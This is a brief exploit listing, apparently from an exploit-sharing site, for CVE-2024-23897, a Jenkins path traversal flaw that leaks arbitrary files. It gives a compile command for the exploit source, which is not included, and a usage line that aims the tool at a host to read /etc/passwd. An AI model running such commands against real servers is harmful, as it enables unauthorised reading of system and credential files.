Exploit for Path Traversal in Jenkins
Exploit Code
## https://sploitus.com/exploit?id=2B439BA4-BAD6-580B-AF9D-D048AF0CDA2D
# CVE-2024-23897 - Jenkins Arbitrary File Leak
# Compile
```bash
g++ CVE-2024-23897.cpp -o exploit
```
# Usage
```bash
/exploit -u http://10.10.10.10 -f /etc/passwd
```